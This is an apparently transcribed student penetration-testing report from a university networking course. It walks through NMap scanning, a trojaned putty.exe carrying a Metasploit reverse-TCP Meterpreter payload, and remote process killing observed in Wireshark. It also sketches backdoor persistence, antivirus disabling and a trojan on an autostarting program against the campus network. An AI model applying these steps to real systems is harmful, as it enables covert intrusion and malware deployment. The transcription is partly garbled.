Security Assessment and Analysis with Penetration Tools and Wireshark. (Final Draft) Ryan A. Drozdowski. Mike Hannaford.

Transcription

1 Security Assessment and Analysis with (Final Draft) James Royal Dr. Janusz Zalewski CNT 4104 fall 2012 Networks Florida Gulf Coast University Fort Myers, Florida James Royal Florida Gulf Coast University 1 Page

2 1. Introduction Network security is very important whether it is personal or business making sure that the information on these networks isn t accessible by unauthorized users. One must make sure that the information on a network isn t easily accessed without proper permission. Penetration tools are perfect for someone to test security of a network because they are very similar to what hackers really use or do depending on the software. [7] A heavily supported operating system that supports many penetration tools is Backtrack. Although the project is using only a few features of Backtrack there are many more available. A great starting tool is NMap which allows someone to map out the confirmation of activities on the network and alert the user of possible security issues. [1] Then there is Metasploit which is a tool used to perform attacks also known as exploits on a certain part of the network.[2] Metasploit can be used to hack in to a network and do detrimental things to a computer on a network. Wireshark is a great tool for monitoring and analyzing data transfer [6]. As data travels over a wire or via a wireless network WireShark picks up the packets traveling over the network and makes this available to the user via a sophisticated graphical user interface. This project is an extension of previous class projects using these three tools Metasploit, NMap, WireShark with the addition of Backtrack 5 an operating system. The following section provides brief introductions to all three tools: Metasploit, NMap, and WireShark and discusses the problem addressed in this project and the methods of its solution. James Royal Florida Gulf Coast University 2 Page

3 2. Previous Accomplishments 2.1 Metasploit The pervious projects objective was to install Metasploit on a virtual machine to perform penetration testing. With the virtual machines put in place the main goal was to find vulnerabilities and deliver payloads to these virtual machines. Once the test has been completed the next goal was to test it against the Computer Science lab network to see if there exist vulnerabilities and if so exploit them. The project started with downloading Metasploit and basic configuration. Metasploit application was installed on a Windows platform running Windows 7 x64. With the installation of Metasploit framework all the firewalls and anti-virus software had to be shutdown because of the nature of penetration testing the computer you re working on may think you are an intruder and may prevent certain actions. Oracle s VirtualBox was installed as the virtual machine on the same machine as the Metasploit is installed. Once the VirtualBox was installed a virtual machine was running a Linux Ubuntu and Windows XP. The last piece of software to have been installed on the machine was Armitage. Armitage is a user interface for Metasploit. That makes it very nice and easy to navigate with Metasploit which itself is a command line program natively. Armitage was downloaded and then set to work on the Metasploit framework installed on this machine. The start up of Armitage which automatically activates Metasploit and then the virtual machine running the Linux OS are required. Once both applications are running the penetration testing is started. Armitage is then used to scan the Computer Science lab network IP address /24 as shown in Figures to display all machines running on the network. James Royal Florida Gulf Coast University 3 Page

4 Figure Quick Scan. [4] James Royal Florida Gulf Coast University 4 Page

5 Figure Scan range. [4] James Royal Florida Gulf Coast University 5 Page

6 Figure After a scan of the network. [4] With this all computers available to attack shown, the virtual machine is running on the local host with IP address The icon of the machine can then be right-clicked with a drop down menu and scanned as shown in Figure When the scan completes all ports identified are shown on the virtual machine as illustrated in Figure Then one can click Attacks on the task bar. When this is done all the available attacks are then shown under the Attacks menu. The exploit tomcat_mgr_deploy can then be selected and a window appears with attack information where all the information is checked to select launch as shown in Figure This attack will launch a Meterpreter to communicate with attacked virtual machine. The Armitage user interface will display the attacked machine with lightning bolts as shown in Figure James Royal Florida Gulf Coast University 6 Page

7 Figure Local machine and Measplotiable virtual machine. [4] Figure Drop down menu options for this machine. Select Scan. [4] Figure Services tab for Measplotiable machine. [4] James Royal Florida Gulf Coast University 7 Page

8 Figure Attack list showing available exploits. [4] Figure Exploited Measplotiable machine. A similar attack was attempted on the Florida Gulf Coast University Computer Science Lab Network which proved to be unsuccessful. This leads to the conclusion that the network has no known vulnerabilities at that time. [4] The main goal of this previous project was achieved but not the secondary goal which is penetrating the Computer Science network. James Royal Florida Gulf Coast University 8 Page

9 2.2 NMap The pervious projects objective was to use of two different applications first, NMap was to detect open ports with the hopes of finding vulnerabilities. The second application was SNORT is an intrusion detection system. With these two applications the goal was to use NMap to attack a computer on the network while concurrently running SNORT to try and detect the attack done by NMap. The previous project s goal was to utilize both NMap and SNORT, so it started by attempting to understand the software: both its capabilities and its limitations. With this, the project was then given a test of both applications. This was to make sure both applications anticipated. SNORT was the first challenge and a custom SNORT detection rules using MYSQL server were written. SNORT has a feature that allows a user to write custom detection rules for a particular environment. NMap was then mapped out how it would scan the network shown in Figure NMap is a command line application with a lot of options; most are available on every network or environment. Figure NMap plan for attack. [5] James Royal Florida Gulf Coast University 9 Page

10 This all was to be performed within a virtual environment NMap running on Windows 7 and the SNORT running on Ubuntu Linux as shown in Figure SNORT was then started and the custom rules were imported to the system. Then the NMap application was started. With SNORT running with its custom rules imported, detected and logged all of NMap s scans even with its flexibility and custom command line scans. Figure Map of the Network. [5] The conclusion of this project was that both NMap and SNORT have very useful functionality and flexibility. SNORT could be expanded to a greater set of rules to detect and log far more data to prevent intrusion and allow for a more secure network. James Royal Florida Gulf Coast University 10 Page

11 2.3Wireshark The previous WireShark project s primary goal was to setup the software on a Windows based personal computer in the Computer Science lab along with a USB device called AirPcap [3]. The project was more of an understanding the software and all its features with little implementation of the software where useful data were collected and a conclusion was drawn that one could tell what was going on over a wireless network effectively. The WireShark is an open source program downloadable from the web at wireshark.org. One must select which operating system is to be used then select download. Along with downloading WireShark another pieces of software that must also be downloaded and installed is WinPCap. If one follows the on screen prompt, it will ask if one wishes to install it. So make sure it is selected as shown in Figure Figure Prompt to download WinPCap. [1] The next step is to insert the AirPcap USB device. Once inserted it will prompt to download the driver. This must be done to use the software as shown in Figure Once James Royal Florida Gulf Coast University 11 Page

12 all this software has been downloaded, one can launch WireShark and sniff packets over a wireless network. Figure Prompt to download the AirPcap driver. [1] With WireShark running, one must select the AirPcap as the interface. Then the scan automatically starts as shown in Figures Once running it was discovered that one could filter the scan either by IP filters or protocol filters. This was used to limit the scan to only cups which is packets using the Common Unix Printing System Protocol [1] as shown in Figure After some analyzing of the data, Apple computers were singled out and the IP address and the type of printer, as shown in Figure 2.3.6, were displayed. James Royal Florida Gulf Coast University 12 Page

13 Figure Select AirPcap as the interface. [1] Figure Sniffing packets over the network. [1] James Royal Florida Gulf Coast University 13 Page

14 Figure The filtered out packets. [1] Figure Displays the individual packets with their relevant data. [1] James Royal Florida Gulf Coast University 14 Page

15 3. Problem Description Given the four tools described in the previous section, the plan was to attempt a hack in to a computer or embedded system over the Computer Science lab wireless network. Each of the three penetration tools will be used; NMap, Metasploit, and WireShark, will have its own role to play, with addition of Backtrack [11]. Backtrack s role is to be the intermediary, as it has: NMap and Metasploit built in to its framework. This software has integrated both programs making it the top choice for the project to execute a successful attack. Backtrack is installed onto the attacking computer giving us access to the penetration tools. NMap s role is to detect and map out all the computers on the wireless network shown in Figure 3.1. The NMap gives the potential ability to see IP addresses, open ports, closed ports and the associated operating system of the machine on a given IP address. This constitutes the first part of the project which is mapping out the network. Figure Computer Science Wireless Network. James Royal Florida Gulf Coast University 15 Page

16 Metasploit is then used to create an exploit that will disguise an attacking program to look like a normal program for example putty.exe. When this exploit is placed on a USB stick and the user clicks on it and saves the file they will receive a putty.exe file with the exploit embedded. Once the program putty.exe is launched on the users computer it will function like putty.exe but the exploit will then notify the attacking computer that the file is up and running. This allows some ports to open on that machine so that Metasploit can then penetrate without the knowledge of the user and perform attacks against it. WireShark can be used for monitoring the attack and watching the data packet exchange. The monitoring can be started from the NMap to the exploit being installed, then the attack being performed by Metasploit. With this knowledge the idea is to see if an attack can be done on another device and if the attack could be prevented by seeing if certain packet transfers are malicious attacks on the network shown in Figure 3.2. Figure 3.2 Map of the Attack over the Network - Computer 1 attacking Computer 2 while Computer 5 monitors all packet transfer. 4. Preparation James Royal Florida Gulf Coast University 16 Page

17 4.1 NMap the CS Network NMap is used to map out the Computer Science lab s wireless network. The first task is to analyze the network which is going to be attacked. NMap is perfect for this task. The first command the project will require is nmap O /24 as shown in Figure 4.1. This command allows one to see all systems on IP address range /24 and displays the operating systems. These data can be used to customize an exploit to attack the specific computer. The one selected will be a Windows 7 pc with the IP address Figure 4.1 Command to display operating systems on the IP range / Running and Setting Up WireShark WireShark is set up to monitor the Computer Science network effectively and efficiently. The AirPcap drivers need to be installed for this purpose. After installation has completed, the AirPcap has to be inserted in the USB port and the wireless networking card will be turned off. After all this has been completed, WireShark is ready to start, using the AirPcap as the selected sniffing interface. After several minutes WireShark will capture about 30,000 data packets over all the wireless networks in the area. There must be a software filter to narrow down the number of recorded packets. Using filter ip.src == ip.dst == as shown in Figure 4.2, sorts through the data and finds only data packets sent and received from the computer with IP Address , which is a computer running in the Computer Science lab. This filtering command is then saved into WireShark s filtering system. This allows future the monitoring of the planned attacks on a computer on the Computer Science Wireless Network. This can also be done for the attacking computer. James Royal Florida Gulf Coast University 17 Page

18 Figure 4.2 Filtering out ip address as the source and destination. 4.3 Backtrack Setup Backtrack is the operating system used in this project to facilitate the attacks. It is saved on a USB stick to be used on any computer. To launch the operating system one must first go into the BIOS of the computer and change the system boot order so that the USB is the first in the order. Once that has been completed, then during the boot screen will then confirm if one wants to boot from USB. Once the operating system is booted on the computer there is another boot screen from the Backtrack. The option that must be selected is Backtrack is persistent text mode boot. Then a command prompt appears to start the desktop with startx. Once it is finished loading, the Backtrack operating system is ready to use as shown in Figure Customizing an Exploit using Metasploit Figure 4.3 Backtrack desktop screen. James Royal Florida Gulf Coast University 18 Page

19 Metasploit is a built in application within the Backtrack operating system. To start Metasploit one must start up the Konsole window. Once the Konsole console window is started, the command msfconsole must be entered. This will launch the Metasploit console as shown in Figure 4.4. If at any time one needs help in the Metasploit window, the command help can be entered. Figure 4.4 Metasploit framework. To create exploit one must first know what payload one wishes to use. For the project we used NMap and found a Windows 7 PC so the selected payload was reverse TCP. To create this exploit one must type use payload/windows/meterpreter/reverse_tcp as shown in Figure 4.5. Once the payload is loaded into Metasploit, type show options to see what is required for this payload as shown in Figure 4.6. This will show that the LHOST and LPORT must be set. The LHOST is the listening computers IP address and the LPORT is the port that the computer will be listening on. To set the LHOST type set LHOST = To set the LPORT type set LPORT = Those are the attribute of our attacking James Royal Florida Gulf Coast University 19 Page

20 computer. With these properties set one can create the exploit. The exploit can be attached to any executable so the chosen program was putty.exe. To generate this infected program type generate k t exe x /tmp/putty.exe f /tmp/putty_pro.exe as shown in Figure 4.7. The k t exe tells the exploit generator that the program being generated will be of extension exe. The -x /tmp/putty.exe tells the exploit generator the source file path. Then the -f /tmp/putty_pro.exe tells the exploit generator the new executable s name and file path. Once the file is created type back to exit the payload menu and return to the main menu within Metasploit. Figure 4.5 Loading the reverse TCP payload. James Royal Florida Gulf Coast University 20 Page

21 Figure 4.6 Shows options for the payload. Figure 4.7 Generates the infected executable. Now that the exploit has been created it is time to launch the listener for that exploit. Type use exploit/multi/handler as shown in Figure 4.8 this will bring you to the screen, where one can listen for the exploit. Once again, one must set both the LHOST and LPORT to the IP address and the port number that is selected for the payload as shown in Figure 4.9. Once that has been completed, typing exploit wait launch program the as shown in Figure James Royal Florida Gulf Coast University 21 Page

22 Figure 4.8 Launches the exploit handler. Figure 4.9 Sets the listening host. James Royal Florida Gulf Coast University 22 Page

23 Figure 4.10 Starts to listen for the exploit. James Royal Florida Gulf Coast University 23 Page

24 5. Implementation 5.1 Methodology Reverse TCP The reverse TCP connection is usually used to bypass firewall restrictions on open ports. The firewall usually blocks open ports, but does not block outgoing traffic. In a normal forward connection, a client connects to a server through the server's open port, but in the case of a reverse connection, the client opens the port that the server connects to. The most common way a reverse connection is used is to bypass firewall and Router security restrictions Trojan Horse The Trojan Horse is an executable running on the computer behind a firewall. This can open an outgoing connection to an external source. Once the connection is made one can send commands to that computer Man in the Middle Another benefit to using Backtrack is the use of Ettercap. Ettercap is a piece of software, which makes initiating a man in the middle attack easy. A man in the middle attack is the process of routing all data packets on the specified network through a given computer on the network before sending them out to the Internet. This attack allows the computer initiating the attack to validate packets and reroute them as needed. A malicious example of this would be if some of the users of the network used the network to do their online banking. The user generating the man in the middle attack wants all usernames and passwords for the users on the network attempting to access Bank of America's website. The user generating the man in James Royal Florida Gulf Coast University 24 Page

25 the middle attack would then sift through all the data packets on the network rerouting the packets with the destination IP address of Bank of America's website to a different desired destination IP which serves a clone of the Bank of Americas website. The end user has no knowledge of the reroute and would continue to enter their login credentials as usual. Once the user hits the submit button, the attacker gains their private information Daemon This project makes use of Metasploit in order to generate Payloads. Metasploit comes with several Payloads for one to use, but also has the ability to generate them if one needs to. This is where Daemons come in to play in this project. Daemons are essentially background processes in operating systems. They are scripts that run in the background. They are headless meaning they do not contain a graphical user interface. It s like a small program running in the operating system that the end user does not see. Daemons can be configured to start when the operating system boots, and shut down when the operating system is terminates. This project creates a Payload that is disguised as the open source putty.exe application that is used as SSH and FTP client. The Payload which is the customized putty.exe application looks, feels, and executes exactly like the putty.exe application downloaded from the Internet. The only difference is that when one opens this generated Payload (putty.exe) file on the target system the Payload sends a reverse TCP connection back to the attacking system, which allows the attacking system access to the target system. The issue with this is that the attacking system only has access as long as our payload is running on the target system. Once the user of the target system exits the Payload it closes the reverse TCP connection. Daemons make creating a back door into the target system a breeze. A back door is the process of creating an entry point on the target system so that the James Royal Florida Gulf Coast University 25 Page

26 user of the attacking system can gain access to it any time they want. This would remove the limitation of our Payload described in the previous paragraph. In order to create a back door on the target system one would need to gain super user privileges on the target system. This can be achieved with some of the other tools Backtrack provides but is out of the scope of this project. This is to inform one on the process of creating a back door. Once one has super user privileges on the target system they would simple need to view the processes running on the target. Our Payload is generated as a system process on the target system. One is the true putty.exe application and the other is the reverse TCP connection back to the attacking computer. With creating a daemon the reverse TCP connection is to be activated when the targeted computer system starts and to stop it when the system shuts down. One could gain access to the target system any time of the day as long as it was turned on without the need for the Payload's execution Exploit and Payloads Once the best vulnerability has been discovered in a network, a small and specialized computer program, called an exploit, is used to take advantage of the vulnerability and give the penetration tester access to the computer system. The exploits are used to deliver the payloads to the target system. These payloads are the way that the penetration tester gains access to the computer. Payloads are introduced in the next paragraph. There are approximately over 180 exploits in the Metasploit Framework. Since the security community is encouraged to get involved in the continuing development of exploits there is currently a public database of usable exploits. The exploit database is constantly being updated by community support and when new exploits are found they are posted. [4] Payloads are pieces of code that get executed on the target system as part of an exploit attempt. A payload is usually sequence of assembly instructions, which helps achieve a specific post-exploitation objective, such as adding a new James Royal Florida Gulf Coast University 26 Page

27 user to the remote system, or launching a command prompt and binding it to a local port. Traditionally, payloads were created from scratch or modifying existing pieces of assembly code. This requires an in-depth knowledge not only of assembly programming, but also of the internal workings of the target operating system. But a number of scripts now enable payloads to be developed without needing to modify any assembly code at all. The different types of payloads allow for different types of control the penetration tester has over the target system. The most commonly used payload is called the Meterpreter. This payload allows the penetration tester to turn on the target systems webcam, take control of the mouse, keyboard and even take screenshots. All of these options are for the penetration tester to see what exact holes there are in the system. Having access to key functions on one computer may not necessarily mean control over the whole network, but it is a start in determining which aspects of the network are the most vulnerable. [4] Backtrack 5 Backtrack Linux is a version of an open source Linux operating system that is licensed under the GPL open source license. Backtrack is used by network professionals in the industry and is considered the standard operating system for digital forensics, and penetration testing. The operating system is named after the well known backtracking algorithm and its current version is Backtrack 5 r3 which is the version that this project is using. Backtrack comes with Metasploit and NMap completely installed in the standard ISO image download, as well as with many other great tools for penetration testing such as Aircrack-ng which enables the ability to crack WEP and WPA wireless passwords, Snort which enables ability to sniff out packets on a given network, Kismit which is an intrusion detection system, Ophcrack which is a windows password cracker that uses LM Hashes through Rainbow tables., James Royal Florida Gulf Coast University 27 Page

28 and Ettercap which is specifically designed for man in the middle attacks. These are just a handful of great penetration applications that come with Backtrack. All of these tools are integrated deep into the operating system which allows for ease of use when it comes to testing a specified network. One can install some of these tools on other operating systems but most of the tools listed here are designed to work best with Backtrack. It is encouraged that if one must take on the task of penetration testing of any network one should use Backtrack Linux as the preferred operating system to do so. Backtrack makes the use of these programs easy and straightforward without the need of customizing an operating system of choice in such a way to use these programs. The benefit of using Backtrack is that it is easily installed onto a USB drive. Due to the fact that Backtrack is based on Linux the specified hardware requirements are not as demanding as for a standard operating system. Backtrack can run on 512 megabytes of RAM and only consumes about 1 Gigabyte of hard drive space. Per this requirement one can easily install Backtrack onto a USB drive and boot into the operating system from just about any computer on any network. This operating system can allow someone with malicious intent to take down an enterprise system and destroy or compromise valuable data like credit card information, privacy information such as social security numbers, and now with the advancements of GPS systems one could obtain location information if they were searching for someone with the intent to do bodily harm. 5.2 Testing Experiments For all the test cases the preparation described in previous sections has not changed and the attacking computer is already in the listening stage as well as the Wireshark computer is also already sniffing. The assumption is that all the directions given in the previous sections have been completed. For the experiment the use of three computers is needed. The first is the computer with Backtrack running the exploit with IP address The next is James Royal Florida Gulf Coast University 28 Page

29 the computer being attacked wirelessly with IP address Last the third computer has to run Wireshark to sniff the wireless packets. These three computers are referred to by exploit computer, attacked computer and Wireshark computer. They are all in their respective waiting stage as shown in Figures The exploit computer is listening at IP on port The attacked computer is about to click on the putty_pro.exe application. Wireshark is scanning packets with the filter ip.scr == ip.dst == Figure 5.1: Exploit computer listening on IP and port James Royal Florida Gulf Coast University 29 Page

30 Figure 5.2: Attacked computer, with application to be clicked. Figure 5.3: Wireshark computer sniffing wireless packets with a filter in place. James Royal Florida Gulf Coast University 30 Page

31 The first step to be done is make a connection. So the attacked computer will click on the putty_pro.exe application. Once that has been done the exploit computer is connected as shown in Figure 5.4. Then Wireshark will detect the connection as shown in Figure 5.5. Figure 5.4: Exploit computer makes the reverse TCP connection. James Royal Florida Gulf Coast University 31 Page

32 Figure 5.5: Wireshark computer see the packets that make the connection. Once the connection has been created one can call commands all of which can be found in the Appendix or by typing? into the exploit computer. The first command that is used by the exploit computer is ps as shown in Figure 5.6. The output shows all the processes running on the attacked computer. The attacked computer has no knowledge of this command being executed. Wireshark will detect the TCP transfer protocol packets transferred between the exploit computer and the attacked computer as shown Figure 5.7. James Royal Florida Gulf Coast University 32 Page

33 Figure 5.6: Exploit computer entering ps command showing all processes on the targeted computer. James Royal Florida Gulf Coast University 33 Page

34 Figure 5.7: Wireshark computer shows TCP packets that were captured the moment after the command ps. James Royal Florida Gulf Coast University 34 Page

35 With the processes being displayed in the exploit computer one can select an ID to kill the process as shown in Figure 5.8. The process that is going to be killed is 5040 which is Internet Explorer on the attacked computer as shown in Figure 5.9. After typing kill 5040 on the Exploit computer as shown in Figure 5.10, Internet explorer on the attacked computer will close as shown in Figure Wireshark will capture the TCP packets that are sent to execute the kill command as shown in Figure This is the end of the experiment. Figure 5.8: Exploit computer selects the process to kill. James Royal Florida Gulf Coast University 35 Page

36 Figure 5.9: Attacked computer has Internet Explorer window open. Figure 5.10: Exploit computer killing process ID 5040 or Internet Explorer. James Royal Florida Gulf Coast University 36 Page

37 Figure 5.11: Attacked computer showing that Internet Explorer was killed by the exploit computer. James Royal Florida Gulf Coast University 37 Page

38 Figure 5.12: Wireshark computer captured the packets moments after the kill command is executed. James Royal Florida Gulf Coast University 38 Page

39 6. Conclusion Security assessment and analysis are complex concepts and require complex tools such as Backtrack, NMap, Metasploit, and Wireshark. NMap is a great tool for preliminary testing such as finding a system to attack or just seeing what s on the network. But it doesn t allow much of anything else but a starting point. Wireshark is a similar tool, since it monitors packets over a network wired or wireless. It won t directly tell anything but it might alert users to a possible threat. Backtrack with the Metasploit frame work built in is the bulk of the penetration testing, as it allows to test and see, for example if your antivirus is any, good among other things. Separately none of these tools software would have been useful but together they allow for very practical applications. The Metasploit exploit yielded success in allowing full control over the attacked computer. It also allowed the viewing of all running processes. Then one can use commands to killed selected processes. With this there may be some other hacks performed, such as the one described in Appendix A. This may lead someone to try other exploits. The limitation of Metasploit is only the user s knowledge of the network and the systems running on it. Wireshark yielded some success but it didn t tell much about the attack on the wireless computer. What it did show was a lot of communication between the two computers as well as the fact that none of the TCP packets were transmitted a 100% which shouldn t be the case in a normal environment. For Wireshark to work functionally one would have to have an in-depth understanding of the network and its behaviors, otherwise one would never gather useful information from all the packets. Further advancement for this type of project would be to investigate the other exploits and perhaps find a way to spread the exploit to multiple computers quickly. NMap and Metasploit have more capabilities than those described in this project. Backtrack also supports different penetration testing tool such as: AirCarck-ng which is used to crack WEP and WPA passwords. Furthermore, other tools, such as Nessus, could be added to expand the project. James Royal Florida Gulf Coast University 39 Page

40 Appendix A: Steps for performing a hack on FGCU s network Step one: Stopping the Antivirus on the computer This can be done by a couple simple system calls done by a C++ program. As proven by Chris Ruskai writing a simple C++ program that suspended the antivirus then disabled it. Step two: Place Infected Program on computer Create an exploit as described in the previous section that is for a program that runs automatically for example the java updater. This allows your attack to go completely unnoticed. Then shut down the computer. Step three: Wait for connection Once the computer is started the Trojan will be launched and your listening computer will then have complete access. Notes: Although this will allow you complete access to the computer and its systems you only have about a minute time slot before the antivirus will be launched again over the network. If you study the system well enough once it launches again it can be killed from the meterpreter before it removes the Trojan. James Royal Florida Gulf Coast University 40 Page

41 Appendix B: Exploit Commands Figure A.1 Core Commands Figure A.2 File System Commands. Figure A.3 Networking Commands. Figure A.4 System Commands. Figure A.5 User Interface Commands. Figure A.6 Webcam Commands. Figure A.7 Elevate Commands. Figure A.8 Passwords Database Commands. Figure A.9 Timestomp Commands. James Royal Florida Gulf Coast University 41 Page

42 Figure A.1 Core Commands. James Royal Florida Gulf Coast University 42 Page

43 Figure A.2 File System Commands. Figure A.3 Networking Commands. James Royal Florida Gulf Coast University 43 Page

44 Figure A.4 System Commands. Figure A.5 User Interface Commands. James Royal Florida Gulf Coast University 44 Page

45 Figure A.6 Webcam Commands. Figure A.7 Elevate Commands. Figure A.8 Passwords Database Commands. James Royal Florida Gulf Coast University 45 Page

46 Figure A.9 Timestomp Commands. James Royal Florida Gulf Coast University 46 Page

47 7. References [1] Marsh, N. NMap cookbook, CreateSpace Independent Publishing Platform, Lexington, KY August, [2] Kennedy, D., O Gorman, J., Kearns, D., and Aharoni, M. Metasploit the Penetration Tester s Guide, no starch press, San Francisco, 2011 [3] Gehring, J. WireShark, FGCU, 2011, URL: [4] Steiner, C. Metasploit, FGCU, 2011, URL: [5] Carestia, E. NMap and SNORT, FGCU, 2011, URL: [6] Wireshark, October, 2012 URL: [7] Agle, M. A Penetration Tester s Toolkit, Linux Journal, vol., no., pp , January, 2012 URL: linuxjournal.com [8] Mudge, R. Live-fire security testing with Armitage and Metasploit, vol., no., pp May, 2011URL: linuxjournal.com [9] NMap User Documentation, 2012 URL: [10] WireShark Display Filters, October, 2012, URL: [11] Backtrack 5, 2012 URL: James Royal Florida Gulf Coast University 47 Page